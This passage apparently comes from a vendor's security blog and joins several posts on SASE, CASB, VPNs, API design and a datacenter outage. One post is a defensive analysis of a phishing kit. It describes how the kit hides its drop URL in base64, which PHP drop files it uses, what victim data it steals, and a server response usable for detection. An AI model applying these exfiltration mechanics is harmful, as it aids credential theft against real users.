better understanding of security risks, and an improved understanding of how to expand security capabilities to better defend against real adversaries. Cato Implements MITRE ATT&CK Cato has implemented the MITRE ATT&CK methodology of identifying and protecting against TTPs on top of the traditional IoCs. We incorporated this ability into our product by implementing a tagging system that tags each security event with the relevant ATT&CK tactics, techniques, and sub-techniques. This allows customers to visualize and understand what threats they face and what attack flows they are vulnerable to, further enabling them to understand where to improve their insight, and what TTPs their adversaries are using. [caption id="attachment_22593" align="alignnone" width="1358"] A view of an event that is mapped to ATT&CK in the Cato Cloud[/caption] So, what did implementing a TTP-based approach reveal to us? As we dove into the details of our signatures, we saw that we could divide them into two main approaches: IoC-based - Covering a specific vulnerability using well-defined IoCs. TTP-based - Covering a behavior of an adversary. We started by looking at our products’ coverage over the entire ATT&CK matrix and trying to understand where we are most vigilant and where we are less so. Our scope was the most common threats we cover (in our customers’ networks), and new threats we covered from the last year. After going through this process and creating a visualization of our threat protection with the ATT&CK Navigator, we found that Cato Cloud provides protection across all stages of the attack flow with particular strengths in the Initial Access and Execution stages. [caption id="attachment_22595" align="alignnone" width="2708"] Cato’s protection capabilities mapped onto the ATT&CK matrix. The darker the color, the more vulnerabilities Cato protects against in that technique. (For simplicity, sub-techniques are not shown.)[/caption] We should not be satisfied with this data alone, while signature numbers and mappings are an insightful metric, the real insights should be derived from events in the field. So, we then examined Cato’s defenses based on the actual events of exploitation attempts in each ATT&CK technique. Our sampling looked at a two-week period spanning some 1,000 networks. [caption id="attachment_22597" align="alignnone" width="2928"] Cato’s security events mapped onto the ATT&CK Matrix. Again, the darker the color the more events found to be using that technique in the last two weeks. Sub-techniques are not shown to keep it simple.[/caption] From this mapping, we can see two things. Most events are from scanning techniques, this is expected as a single scan can hit many clients with many protocols and generate many events. We see events from many different techniques and tactics, which means that covering more than just the perimeter of the network does increase security as adversaries can appear in any stage of the attack flow and should never be assumed to exist only in the perimeter. Putting aside scans, we found that TTP-based signatures identified far more security events than the IoC-based signatures did. Below is a table mapping the percentage of events identified by TTP-based (ATT&CK) and IoC-based approaches over our sampling period. Looking at the table, three techniques represent 87% of all events in the last two weeks. Counting the signatures, we saw that on average 78% of all signatures were IoC-based and only 22% were TTP-based. [caption id="attachment_22635" align="alignnone" width="632"] Top 3 techniques based on number of events, excluding scans.[/caption] But when we looked at the number of total events, we noticed that on average 94% are TTP-based and only 6% are IoC-based, this affirms our TTP-based approach’s effectiveness in focusing on those areas of actual importance to organizations. TTP: Lets You Focus on Quality Not Chase Quantity Focusing on TTP-based signatures provides a wide angle of protection against unknown threats, and the potential to block 0-days out of the box. On top of 0-days, these signatures cover past threats just as well, giving us a much greater ratio of threats covered per signature. The IoC-based approach is less valuable, identifying fewer threats confronting today’s enterprises. TTP-based signatures prove to save production time by having a better protection for less effort and giving us more confidence in our coverage of the ATT&CK Matrix. What’s more, when covering IoC-based signatures, the focus is on the number of signatures, which does not necessarily result in better security and might even lead to a false sense of one. The bottom line is that one good TTP-based signature can replace 100 IoC-based ones, allowing enterprises to focus on quality of protection without having to chase quantity of threats.

If Only Kodak and Nokia Resellers Had Known

A short story that doesn’t have to be yours Prologue You’re the captain of a massive container ship filled with servers, hard drives, and mounting racks, making its way through stormy waters. The heavy cargo makes it hard for the ship to float and for you to navigate it safely to its destination. Suddenly, you...
If Only Kodak and Nokia Resellers Had Known A short story that doesn’t have to be yours Prologue You’re the captain of a massive container ship filled with servers, hard drives, and mounting racks, making its way through stormy waters. The heavy cargo makes it hard for the ship to float and for you to navigate it safely to its destination. Suddenly, you notice a huge boulder ahead. You try to steer away, but the heavy cargo makes it difficult, and it seems like impact is inevitable. As you sound the alarm, you jump into action without wasting a second and start packing your single lifeboat with all the appliances you can get your hands on. Your team looks at you scared and puzzled, but you’re positive you can save everything; yourself, your team, and all the appliances ignoring the fact that they were the ones that led to the collision in the first place. Dramatic? Yes. Ridiculous? Not really  You’re likely facing this dilemma while reading this blog post. Will you act differently?  A good 50-90% of your revenue comes from reselling appliance-based point solutions. You’re operating on slim margins, and it’s becoming more and more challenging to differentiate yourself and explain the value you bring to your customers. You find it hard to hire top engineers and sales professionals because they’re busy selling cloud solutions and future-proofing their careers.   You see the storm waves rising. You feel the steering wheel getting heavier by the minute. [boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls?utm_source=blog&utm_medium=top_cta&utm_campaign=what_others_wont_tell_you"] What Others Won’t Tell You About MPLS | Get The eBook [/boxlink] Let’s pause here and look at the facts On November 16th, 2021, Riverbed Technology announced filing for Chapter 11 Bankruptcy. Check Point Software Technologies was recently pushed out of the Nasdaq 100 Index. These events happen while the network security business is skyrocketing, and the competitors are reaching an all-time high in market valuation and revenue growth. What do these companies have in common? First, they never really embraced the convergence of networking and network security. Secondly, their solutions are not cloud-delivered as a service but are still heavily dependent on edge appliances, physical or virtual. While most other pure SD-WAN and network acceleration companies were acquired (VeloCloud by VMware, CloudGenix by PAN, Viptela by Cisco) as a part of a SASE play, Riverbed stood by itself as an appliance-based point solution company. While most leading security vendors made aggressive moves towards SASE convergence or integration onto the cloud (PAN, Fortinet, VMware, Cisco), Check Point stayed away from networking and was late to launch cloud-delivered solutions. These are all obvious indications, warning signs, if you will, of a fundamental shift in IT architectures. Ignoring these signs is equivalent to loading your lifeboat with appliances while riding 100 feet waves. You, as a reseller or a service provider, can’t save yesterday’s technology. Evolving is no longer the privilege of the brave and innovative but necessary for any business looking to remain relevant. You can choose how your business story unfolds. Consider the following one. A day in the life of a cloud-native SASE reseller Resellers and service providers of cloud-native SASE solutions help their customers transform their networks into agile, flexible, and maintenance-free environments. They bring to the table a highly differentiated offering that enterprise customers going through digital transformation deeply appreciate. These partners generate recurring revenues that future-proof their financials. They enjoy the rewards of buying a managed service just like you recommend to your customers. Their SASE Cloud provider takes care of the network, hires the right personnel, maintains, patches, and updates everything according to the industry’s best practices. The provider releases new features and capabilities that are available to their customers at the flip of a switch and is accountable for all the network and security components of its service. These SASE partners have ‘one throat to choke’ and benefit from unmatched SLA. On their SASE deals, SASE partners make high margins and add their professional and managed services on top for even more attractive blended margins. Their employees master modern technologies, taking pride in driving this revolution rather than trying to convince everyone, themselves included, that nothing is changing. And their customers? They will never go back to appliance-based solutions. Thanks to their trusted partners, they now enjoy a scalable and resilient cloud-native network and a full security stack delivered as a cloud service. They are becoming SASE experts and thought leaders, and some of them even started their own blogs. But most importantly, they weathered the storm. Their ships are safe, and so is everyone on them. The Way Forward: How to Win in a Changing Business Environment   Cloud-delivered solutions are winning. Cloud datacenters replace the world’s on-premises data centers. Cloud application replaced most of our on-prem applications. The 2019 COVID outbreak accelerated cloud and SASE adoption, as enterprises moved to work-from-anywhere. The SASE revolution is here, as defined by the world’s leading analysts, changing networking and network security for good. 2022-2025 is the transition period to mainstream adoption of SASE among enterprise customers 1 Our music is in the cloud. No more CDs. MP3 players are no longer needed. We have smartphones. Cloud and convergence are revolutionizing the way we use technology. Why would network and network security be any different? They are not. These shifts in the market don’t happen overnight. Business managers that recognize them, must adapt to ensure the relevancy and profitability of their companies. Not all appliances will disappear. Some customers, in some cases, will still choose them. But, they represent the past. In the same way that CDs, Kodak films, and Nokia (not so smart) phones are still available, edge appliances will stick around. But do you want your business to be recognized by these legacy solutions? Do you want their success or failure to determine yours? Be brave enough to write your own story.       1 Gartner, “Hype Cycle for Enterprise Networking ” Andrew Lerner. October 11, 2021    GARTNER is registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.     

How Schema-First approach creates better API, reduces boilerplate and eliminates human error

In the server team at Cato Networks, we are responsible for building the web console for network and security configuration. Cato Networks is currently experiencing rapid growth in which bigger customers require control over the Cato API and the old solutions, that were built quickly can no longer stand the scale. Obviously, in tandem the...
How Schema-First approach creates better API, reduces boilerplate and eliminates human error In the server team at Cato Networks, we are responsible for building the web console for network and security configuration. Cato Networks is currently experiencing rapid growth in which bigger customers require control over the Cato API and the old solutions, that were built quickly can no longer stand the scale. Obviously, in tandem the development teams are also growing rapidly. All this led us to decide to move from a large and complex json over http API, which was only used by our UI, to a public graphQL API that is exposed to customer use, while still serving our web application. We needed to choose the development approach for the API. Use code as a single source of truth and have schema as an artifact generated from the code (aka. Code-First approach), or create a schema and implement code to match its definitions (aka. Schema-First approach). We decided to go Schema-First, and in this post I’d like to explain why. FOCUS When API development starts from writing the code, it is hard to stay focused on its structure, consistency, and usability. On the other hand, when development starts from describing the API in the schema, while abstracting from the actual implementation, it creates clear focus. You also have the entire schema in front of your eyes, and not scattered through the codebase,  which helps to keep it consistent and well organized. [boxlink link="https://www.catonetworks.com/resources/management-application-walkthrough/?utm_source=blog&utm_medium=top_cta&utm_campaign=management_demo"] Cato Management Application | 30 min Walkthrough [/boxlink] INTERFACE We treat our schema as an interface between front and back, which is visible and clear to both sides. After agreeing on a schema, code on both ends can be written in parallel, without worrying about misaligned bridge situations:   DECOUPLING  When working with a Code-First approach there is a backend-frontend dependency. Code is required to be written at the backend first, so the schema can be generated from it, slowing down the frontend development, and leading to slower schema evolution. In contrast, there is no dependency on the backend team when working Schema-First. No need to wait for any code to be written (and schema to be generated from it). Schema modifications are fast and the development cycle is shortened. CODE-GEN After designing the schema, it is easy to start implementing it, building from a generated code both on frontend and backend. We hooked code-gen in our build process, and were getting server stubs that are perfectly aligned with schema in terms of arguments, return types, and routing rules.  The only thing that is left to be done is writing actual business logic. There is no need to worry that your server-side code diverges from schema, because upon any change to schema, code is re-generated and you can spot the problem early, at compile time. Things are even better at the client side. There are tools that allow you to generate a fully functional client library from the schema. We use Apollo's official codegen tool for this purpose. Getting data from the server became a no-brainer, just calling a method on a generated client library that we spend zero effort creating. BEING DECLARATIVE GraphQL allows you to create custom directives and handlers for them. We utilized this to cut the security and validation concerns from the query resolvers code and centralized them, declaratively, inside the schema. For example, we have @requireAuth directive that can be set on a type, field or argument to define that this is a restricted part of the API. Here are some self-explanatory examples of our custom-built validation directives: @stringValue(regex:String, maxLength:Int, minLength:Int, oneOf: [String!]) @numberValue(max:Int, min:Int, oneOf: [Int!]) @email @date(format:String,future:Boolean) This not only reduces the code on the server side, but also gives some hints to the frontend, in terms of validations that need to be implemented to eliminate unnecessary roundtrips of not valid inputs. SUMMARY Almost all of the points described here apply not only for graphQL API, but to any schema-based API, like OpenAPI (aka. Swagger)  for json over HTTP or  gRPC. In any case Schema-First or Code-First is a decision that must be made on a per project basis, taking into consideration its specifics and needs. I do hope I've managed to encourage you to at least give a Schema-First approach a chance.    

Cato Resiliency: An Insider’s Look at Overcoming the Interxion Datacenter Outage

The strength of any network is its resiliency—its ability to withstand disruptions that might otherwise cause a failure somewhere in the connectivity. The Cato Cloud service proved its resiliency during the massive hours-long service outage of the LON1 Interxion data center at its central London campus on January 10. Interxion suffered a catastrophic loss of...
Cato Resiliency: An Insider’s Look at Overcoming the Interxion Datacenter Outage The strength of any network is its resiliency—its ability to withstand disruptions that might otherwise cause a failure somewhere in the connectivity. The Cato Cloud service proved its resiliency during the massive hours-long service outage of the LON1 Interxion data center at its central London campus on January 10. Interxion suffered a catastrophic loss of power beginning just before 18:00 UTC on a Monday evening. The failure cut out multiple power feeds going into the building, and equipment designed to switch to backup generator power also failed. The result was complete loss of power leading to service outages for numerous customers dependent on this particular data center. Hundreds of companies were impacted with the London Metal Exchange, for example becoming unavailable for nearly five hours. Cato customers were also impacted by this outage – for a few seconds. For the benefit of proximity to the financial and technology hubs near Shoreditch, Cato has a PoP in this Interxion datacenter. That means that Cato’s customers, too, were affected by the sudden unavailability of our PoP. However, most customers suffered few repercussions as their traffic was automatically moved over to another nearby Cato PoP for continued operation. The transfer took place within seconds of the LON1 power failure, and I’d venture a guess that few Cato customers even noticed the switch-over. To a network operator, this is a true test of both resiliency and scale. [boxlink link="https://www.catonetworks.com/resources/tls-decryption-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=tls_demo"] Cato Demo | TLS Inspection in Minutes [/boxlink] Cato’s Response to the Outage Was Both Immediate and Automatic On January 10 at 17:58 UTC, we started to receive Severity-1 alerts about our London PoP. The alerts indicated that all our machines in London were down. We were unable to access our hardware with any of our carriers. Calling Interxion proved impossible. Only later did we learn that the power outage that took down the datacenter also disrupted their communications. The same was true for opening a support ticket; it too elicited no response. Checking Twitter showed different complaints about the same thing. Despite having no word directly from Interxion, we understood there was a catastrophic power failure. We incident to our customer about 10 minutes after it started on our status page -- official reports would only be received several hours later. As for the impact on SASE availability, every Cato customer sending traffic through this London PoP using a Cato Socket (Cato’s Edge SD-WAN device) had already been switched over within seconds of the power outage to a different PoP location. They were humming away as if nothing had happened. Most customers had their traffic routed to Manchester instead of London. Our PoPs have been designed with surplus capacity precisely for these reasons. You can see from the chart below that our Manchester PoP saw a sudden increase in tunnels coming in, and we were able to accommodate the higher traffic load without a problem. This demonstrates both the resiliency and the scale of Cato’s backbone network. [caption id="attachment_22306" align="alignnone" width="2746"] This graph shows how the number of tunnels at Cato’s Manchester PoP suddenly quadrupled at 18:00 UTC on January 10, 2022, as users automatically switched over from our London PoP due to the Interxion outage. [/caption] There were a few exceptions to the quick transition from the London PoP to another. Some Cato customers, for whatever reason, choose to use a firewall to route traffic rather than a Cato Socket. In this case, they create a tunnel using IPsec to a specific PoP location. Cato recommends – and certainly best practices dictate – that the customer create two IPsec links, each one going to a different location. In this case, one link operates as a failover alternative to the other. We had a handful of customers using firewall configurations with two tunnels going only to the London site. When London went down, so did their network connections—both of them. We could see on our dashboard exactly which customers were affected in this way and reached out to them to configure another tunnel to a location such as Manchester or Amsterdam. Here’s a comment from one such customer: “When dealing with the worst possible situation and outage, you have provided excellent support and communications, and I am grateful.” Lessons We Took Away from This Incident At Cato, we view every incident as an opportunity to strengthen our service for the next inevitable event. We think about rare case scenarios that can happen and run retrospective meetings from which we identify the next actions that need to be taken to ensure the resiliency of our solution. When we built a service with an SLA of five 9’s this is the commitment we made to our customers. When we carry their traffic, we know that every second counts. This requires ongoing investments and thinking about how things could go wrong and what we have to do to ensure that our service will be up. Part of that is what drives our continued investment in opening new PoPs across the globe and often within the existing countries. The density of coverage, not just the number of countries, is important when considering the resiliency of a SASE service. Who would ever have thought that a major datacenter in the heart of London would lose access to every power source it has? Well, Cato considered such a scenario and prepared for it, and I’m pleased to say that this unexpected test showed our service has the resiliency and scale to continue as our customers expect it to.    

Here’s Why You Don’t Have a CASB Yet

There’s An App for That What used to be a catchphrase in the world of smartphones, “There’s an app for that”, has become a reality for enterprise applications as well. Cloud-based Software as a Service (SaaS) applications are available to cater for nearly every aspect of an organization’s needs. Whichever task an enterprise is looking...
Here’s Why You Don’t Have a CASB Yet There's An App for That What used to be a catchphrase in the world of smartphones, "There's an app for that", has become a reality for enterprise applications as well. Cloud-based Software as a Service (SaaS) applications are available to cater for nearly every aspect of an organization's needs. Whichever task an enterprise is looking to accomplish - there's a SaaS for that. On the flip side, the pervasiveness of SaaS has enabled employees to adopt and consume SaaS applications on their own, without IT's involvement, knowledge, nor consent. While CASB solutions, which help enterprises cope with shadow IT, have been around for quite a while, their adoption has been relatively limited and mostly on the larger end of the enterprise spectrum. As the shift to cloud trend has been adopted by nearly all enterprises of all sizes, and the need for a solution such as CASB being so evident, the question remains why are we not seeing greater adoption? Here are a few common objections: It's too complex to deploy and run Deploying a stand-alone CASB solution is no trivial feat. It requires extensive planning and mapping of all endpoints and network entities from which information needs to be collected. It also requires continuous deployment and updating of PAC files and network collector agents. There is also typically a need to modify the network topology to allow cloud-bound data to pass through the CASB service. It adds network latency CASB processing in inline deployment mode can add significant network latency. When there is a need to decrypt traffic in order to apply granular access rules, there is additional latency due to encryption/decryption processing. Adding a CASB service to your traffic flow often means adding an additional network hop adding more latency still. It requires domain expertise While operating a CASB solution isn't rocket science, it still requires a fair amount of knowledge and experience to implement correctly and ensure cloud assets and users are protected effectively. Many IT teams lack the resources and expertise to manage a CASB and simply pass on it. I don't see the need for CASB This objection comes up more often than one might think. In many cases it is raised by IT managers who believe their SaaS usage is minimal and in check. To understand the full extent of an organization's SaaS usage, there is a need for a CASB shadow IT report. But the report is available only after the CASB has been deployed. This deadlock often hinders enterprises from seeing the value and importance of CASB. [boxlink link="https://www.catonetworks.com/resources/cato-casb-overview?utm_source=blog&utm_medium=top_cta&utm_campaign=casb_wp"] Cato CASB overview | Read the eBook [/boxlink] Keep It Simple CASB While CASB is undoubtedly an essential component for any modern digital enterprise, the abovementioned concerns are causing many IT leaders to keep their CASB aspirations at bay. But what if we could make all of these hurdles go away? What if there was a CASB solution that takes away the deployment complexity, eliminates network latency, reduces the required expertise, and enables any IT manager complete insight into their SaaS usage without needing to invest time, effort or cost whatsoever? This may sound too good to be true, but when we deploy CASB as part of true SASE cloud service, we are able to achieve this and bring CASB within reach of any enterprise. But what does "true SASE" mean? And how does it help deliver on these promises? True SASE means all edges. A true SASE solution processes all enterprise network traffic, this includes both on-site and remote users. Since all traffic passes through the SASE service, there is no need to plan or deploy PAC files, agents, or collectors of any kind. All the information the CASB needs is already available. True SASE means single pass processing. A true cloud-native SASE service executes networking and security services in parallel as opposed to sequential service chaining. This means no additional latency is added by enabling the CASB service. True SASE means unified management. A true SASE solution enables management and visibility of all networking and security services in a single-pane-of-glass management console. As all network edges, users, and applications are already defined in the system, adding CASB involves minimal additional configuration and ensures simple and fast ramp up. True SASE means convergence. A true SASE solution fully converges CASB as part of the SASE software stack and enables it complete visibility of all cloud-bound traffic, without the need for any additional deployment or configuration. This enables any enterprise employing SASE to try CASB and view a full shadow IT report instantly, without effort, cost or commitment. Cato's SASE cloud is a true SASE service. It covers all edges, it is implemented as a Single Pass Cloud Engine (SPACE), uses a unified, single-pane-of-glass management system for all services, and fully converges all networking and security services into a single software stack. As a result, Cato is offering today a "CASB Zero" solution that requires zero planning and zero deployment, adds zero latency, requires zero domain expertise, and enables a zero friction and zero commitment PoC to any Cato SASE customer. Cato CASB - zero reason not to give it a try.      

Moving Beyond Remote Access VPNs

The COVID-19 pandemic drove rapid, widespread adoption of remote work. Just a few years ago, many organizations considered remote work inefficient or completely impossible for their industry and business. With the pandemic, remote work was proven to not only work but work well. However, this rapid shift to remote work left little time to redesign...
Moving Beyond Remote Access VPNs The COVID-19 pandemic drove rapid, widespread adoption of remote work. Just a few years ago, many organizations considered remote work inefficient or completely impossible for their industry and business. With the pandemic, remote work was proven to not only work but work well. However, this rapid shift to remote work left little time to redesign and invest in remote work infrastructure and raised serious information security concerns. As a result, many companies attempted to meet the needs of their remote workforce via remote access VPNs with varying levels of success. What is a Remote Access VPN and How Does it Work? A remote access virtual private network (VPN) is a solution designed to securely connect a remote user to the enterprise network. A remote access VPN creates an encrypted tunnel between a remote worker and the enterprise network. This allows traffic to be sent securely between these parties over untrusted public networks. VPNs in general are designed to create an encrypted tunnel between two points. Before sending any data over the connection, the two VPN endpoints perform a handshake that allows them to securely generate a shared secret key. Each endpoint of the VPN connection will use this shared encryption key to encrypt the traffic sent to the other endpoint and decrypt traffic sent to them. This creates the VPN tunnel that allows traffic to be sent over a public network without the risk of eavesdropping. In the case of a remote access VPN, one end of the VPN connection is a VPN appliance or concentrator on the enterprise network and the other is a remote worker’s computer. Both sides will perform the handshake and handle the encryption and decryption of all data on the VPN connection, and a user will have access to resources similar to if they were in the office. Why Companies Need to Move Beyond Remote Access VPNs The reason why Remote access VPNs were widely adopted in the wake of COVID-19 was because companies had existing VPN infrastructure and were simply comfortable with the technology. However, these VPN solutions have numerous limitations, including: Continuous Usage: Corporate VPN infrastructure was originally designed to occasionally connect a small percentage of the workforce to the enterprise network and resources. With the need to support continuous remote work for most or all of the organization’s employees, remote access VPNs no longer meet business requirements. Limited Scalability of VPNs: Existing VPN infrastructure was not built to support the entire workforce, making it necessary to scale to meet demand. Attempting to solve this issue using additional VPN appliances or concentrators increases the complexity of the enterprise network and requires additional investment in security appliances as well. Lack of Integrated Security: A remote access VPN is designed to provide an encrypted connection between a remote worker and enterprise systems. It does not include the enterprise-grade security inspection and monitoring that is necessary to protect against modern cyber threats. Relying on remote access VPNs forces companies to invest in additional, standalone security solutions to secure their VPN infrastructure. Security Granularity: A remote access VPN provides access similar to a direct connection to the enterprise network. These VPNs provide unrestricted access to enterprise resources in violation of the principles of least privilege and zero-trust security. As a result, a compromised account can provide an attacker with far-reaching access and enables the unrestricted spread of malware. Performance and Availability: VPN traffic travels over the public Internet, meaning that its performance and availability depend on that of the underlying Internet. Packet loss and jitter are common on the Internet, and latency and availability issues can have a significant impact on the productivity of a remote workforce reliant on remote VPNs for connectivity. Geographic Limitations: VPNs are designed to provide point-to-point connectivity between two locations. As companies become more distributed and reliant on cloud-based infrastructure, using VPNs for remote access creates complex VPN infrastructure or inefficient traffic routing. Remote access VPNs were a workable secure remote access solution when a small number of employees required occasional remote connectivity to the enterprise network. As telework becomes widespread and corporate networks become more complex, remote access VPNs no longer meet enterprise needs. Enterprise Solutions for Secure Remote Access VPNs are the oldest and best-known solution for secure remote access, but this certainly doesn’t mean that they are the best available solution. The numerous limitations and disadvantages of VPNs make them ill-suited to the modern, distributed enterprise that needs to support a mostly or wholly remote workforce. Today, VPNs are not the only option for enterprise secure remote access. Gartner has coined the term Secure Access Service Edge (SASE) to describe cloud-native solutions that integrate SD-WAN functionality with a full security stack. Zero trust network access (ZTNA) is one of the security solutions integrated into SASE and serves as a superior alternative to the remote access VPN. Some of the advantages of replacing remote access VPNs with SASE include: Scalability and Flexibility: SASE is built using a network of geographically distributed, cloud-based Points of Presence (PoPs). This enables the SASE network to seamlessly scale to meet demand without the need to deploy additional VPN and security appliances. Availability and Redundancy: SASE nodes are built to be redundant and to identify the best available path to traffic’s destination. This offers much higher availability and resiliency and eliminates the single points of failure of VPN-based remote access infrastructure. Private Backbone: SASE PoPs are connected via a secure private backbone. This enables it to provide performance and availability guarantees that are not possible for Internet-based VPNs. Integrated Security: In addition to ZTNA, which enforces zero-trust access controls, SASE PoPs integrate a full stack of network security solutions. This enables them to provide enterprise-grade security without the need for additional standalone security solutions, inefficient routing, or security chokepoints. If you’re looking to deploy or upgrade your organization’s secure remote access infrastructure, a remote access VPN is likely not the right answer. Cato’s SASE-based remote access service provides all of the benefits of a VPN with none of the downsides. To learn more about SASE and how it can work for your business, contact us here. Learn More About Security Aspects of Remote Access Discover additional concepts related to remote network access and security management in the world of information security. SASE Learn about Secure Access Service Edge (SASE), a new enterprise networking category: What is SASE | SASE Architecture | SASE Gartner Definition Endpoint Security Learn about cutting edge endpoint security technologies. Endpoint Detection and Response (EDR) | Endpoint Protection Platforms Authored by Hysolate BYOD Learn about the challenges of bring your own device (BYOD) for organizations. BYOD Policy | BYOD Security | Secure Remote Access Authored by Hysolate  

Analysis of Phishing Kill Chain Identifies Emerging Technique That Exploits Trust in Your Collaboration Platforms

Think of phishing and most people will think of cleverly crafted emails designed to get you to click on malicious links. But new research shows that increasingly attackers are turning to seemingly legitimate and implicitly trusted collaboration tools to penetrate enterprise defenses. Here’s what they’re doing and how you (or your security vendor) can detect...
Analysis of Phishing Kill Chain Identifies Emerging Technique That Exploits Trust in Your Collaboration Platforms Think of phishing and most people will think of cleverly crafted emails designed to get you to click on malicious links. But new research shows that increasingly attackers are turning to seemingly legitimate and implicitly trusted collaboration tools to penetrate enterprise defenses. Here's what they're doing and how you (or your security vendor) can detect and stop these attacks. Phishing Attacks Tap Collaboration Platforms Phishing continues to be one of the most dangerous threats to organizations as an initial vector to infiltrate the network organization or to steal organization credentials. We see, on average, 8,000 entrances to phishing sites per month, all of which are blocked or logged by the Cato SASE Cloud (Figure 1). [caption id="attachment_22118" align="alignnone" width="568"] Figure 1 – On average, we’re seeing 8,000 entrances to phishing sites per month[/caption] The bulk of phishing attacks typically rely on email domains such as Gmail to make it appear to unsuspecting victims that they are just receiving one more innocuous message from a trusted domain. But increasingly, we’re seeing the use of compromised accounts such as Microsoft “OneNote” and “ClickUp” to distribute URLs that are actually phishing attacks. Collaboration platforms have, in effect, become another vehicle for distributing malware. [boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help | Get the eBook [/boxlink] Staying Under the Radar The delivery stage of such an attack starts with an email from a compromised email account in one organization, usually a known partner, that doesn’t attract suspicion. The use of a real email account makes the phishing attack appear to be a legitimate email. Unfortunately, the email is anything but legitimate. It typically contains some social-engineering script with a link to a compromised “OneNote” or “ClickUp” account that makes it challenging to detect. In the case illustrated below, the “OneNote” account even contains a “look-alike” file that is an image resource with a link that redirects the phishing victim to what appears to be the Office 365 landing page. The OneNote account is even designed to be replaced by other compromised accounts if the account being used is reset. [caption id="attachment_22092" align="alignnone" width="724"] Figure 2 – The overall phishing attack flow starts with an “innocent” email (1) linking to a compromised account (2), such as OneNote, which redirects the victim to what looks like an Office 365 login page(3). [/caption] It turns out phishing attack is also hosted on a legitimate service called “Glitch” that is typically used for web development. The cybercriminals in this example made sure the attack would go undetected from delivery all the way to the final landing page by most of the security tools organizations commonly employ. Phishing Kit Anatomy These attacks are also unique in that once credentials are submitted, the victim’s data is being sent using HTTP-POST to the “drop URL” that is placed in a remote server. In most of the attacks that we’ve analyzed, the most common PHP remote drop file name was named next.php or n.php. Fortunately, many of the perpetrators of these attacks don’t remove the phishing kit from the attack’s web server. By probing the site, you may find the phishing kit placed within the site such as the Office 365 example below: [caption id="attachment_22094" align="alignnone" width="2064"] Figure 3– Open directory listing contains phishing kit [/caption] This analysis makes it then possible to identify characteristics of the phishing kit that can be used to find new ways to block phishing domains that now routinely include collaboration platforms. Phishing Kit Code Analysis Going deeper, we also dissected some of the kit to uncover a few interesting pieces of code that are worth noting. For example, we can see the email that is used to receive the victim information (see Figure 8.). Usually, phishing kits are sold on the Darknet for relatively low prices. Looking at the analyzed PHP code snippet of the phishing kit (Figure 8), the “$recipient” variable should be filled by the buyer's drop email to capture the compromised credentials. However, the comment “Put your email address here” also make it easy for even someone with no coding skills to configure the attack settings. [caption id="attachment_22096" align="alignnone" width="1088"] Figure 4 – phishing kit code settings[/caption] In addition, we can see the $finish_url variable is set to Office’s o365. That means once the credentials are submitted the victim will be redirected to the official O365 website, so they don’t suspect that he was a victim of a phishing scam. Another interesting element is the validation of the authentication. If the authentication is validated then the victim information will be encoded with bas64 and sent to a specific chosen URL. The URL is encoded in base64 to obfuscate the URL destination (inside the function base64_decode). The purpose of this URL is to be used as a DB file with all the victim’s information. [caption id="attachment_22098" align="alignnone" width="2456"] Figure 5 – Authentication code snippet[/caption] As can be shown in the snippet (Figure 8) the information that the phishing scam exfiltrated is not only the credentials of the victim but also additional information such as client IP, country, region, and city. [caption id="attachment_22100" align="alignnone" width="2406"] Figure 6 – Exfiltrated information[/caption] We have also analyzed domains that use the same phishing kit so we can see a few network characteristics that can be used to block this campaign. For example, once you submit the credentials you receive the following response from the server {"signal":"ok","msg":"InValid Credentials"}. We have observed similar responses received from different phishing domains that use the same kit. This behavior can be used to detect a user that inserted information required by the phishing attack. Attackers Are Able to Evade Phishing Solutions While there are many solutions for detecting phishing, we still see adversaries finding new techniques to evade them. The use of trusted collaboration platforms is more much insidious than the familiar email-based attack that most security teams already know how to counter. However, it’s also apparent that by examining code and network attributes, IT teams can detect and stop these attacks.    

Channel Partners Favor Scale and Deliverability Over Product Margins, Finds Cato Survey

Our recent survey  Security or Performance: How do you Prioritize? has a lot to say about what enterprise IT leaders value vis-à-vis the tradeoffs between network performance and security effectiveness. But as a channel guy, what I found particularly interesting were the insights the survey offered about the channel. Along with the 2045 IT leaders, the...
Channel Partners Favor Scale and Deliverability Over Product Margins, Finds Cato Survey Our recent survey  Security or Performance: How do you Prioritize? has a lot to say about what enterprise IT leaders value vis-à-vis the tradeoffs between network performance and security effectiveness. But as a channel guy, what I found particularly interesting were the insights the survey offered about the channel. Along with the 2045 IT leaders, the survey canvassed nearly 1,000 channel partners across the globe about their top security partner considerations. Partners covered the spectrum including resellers, MSP, agents, and master agents across the Americas (33%), EMEA (26%), and APAC (41%). Only a handful of them worked with Cato, providing us deep insight into the overall channel industry. What we found was surprising and should help inform the strategic direction of any IT service provider or reseller. Delivering Appliances Has Become Risky Business You might think that money talks, and so product margins and wealth of services would be the channel’s top considerations, but our survey tells a different story. Far more important than a product’s margins, is the complexity of bringing that product to market. Product margins came in 8th overall when we asked respondents about their priorities when evaluating security vendors. Scalability, ease of management, ease of integration, and the ability to deliver as service were all ranked higher, regardless if you’re speaking about agents and master agents or VARs, MSPs, SIs, or ISPs. Another way to put that is that the overhead of delivering appliances often outweigh the margins in selling them. This just one indicator that the business argument for network appliances is being called into question. Appliances have always been about facilitating access to the datacenter, but over 70% of respondents agree or strongly agree that the datacenter is no longer the center of data and that most applications and data reside elsewhere. Furthermore, security appliances themselves are proving to be a source of security vulnerabilities, which creates brand and customer relationship problems for the partners delivering those products. As Cato’s director of security, Elad Menahem, explained back in October, security advisories published by Cisco Security revealed several significant vulnerabilities in Cisco IOS and IOS XE software. Nor is Cisco alone. Having to drop everything and patch appliances has become all too common, pointed out Peter Lee, security engineer at Cato last fall. No wonder that 80% of respondents agree or strongly agree that for mid-size enterprises, SASE offers better security as it’s easier to manage and allows full visibility into network traffic. It should also come as no surprise then that over 60% of respondents agree or strongly agree that reselling security appliances has become a risky business. The question is, what’s the alternative? [boxlink link="https://www.catonetworks.com/resources/8-sase-drivers-for-modern-enterprises/?utm_source=blog&utm_medium=top_cta&utm_campaign=8_sase_drivers"] 8 SASE Drivers for Modern Enterprises | Get the eBook [/boxlink] SASE Cloud Addresses Appliance Limitations Again, looking at the priorities for the channel -- scalability, ease of management, ease of integration, the ability to deliver as service, and time to market – are all attributes of the cloud. It becomes much easier to profit from offering cloud services. Delivering security and networking capabilities as cloud 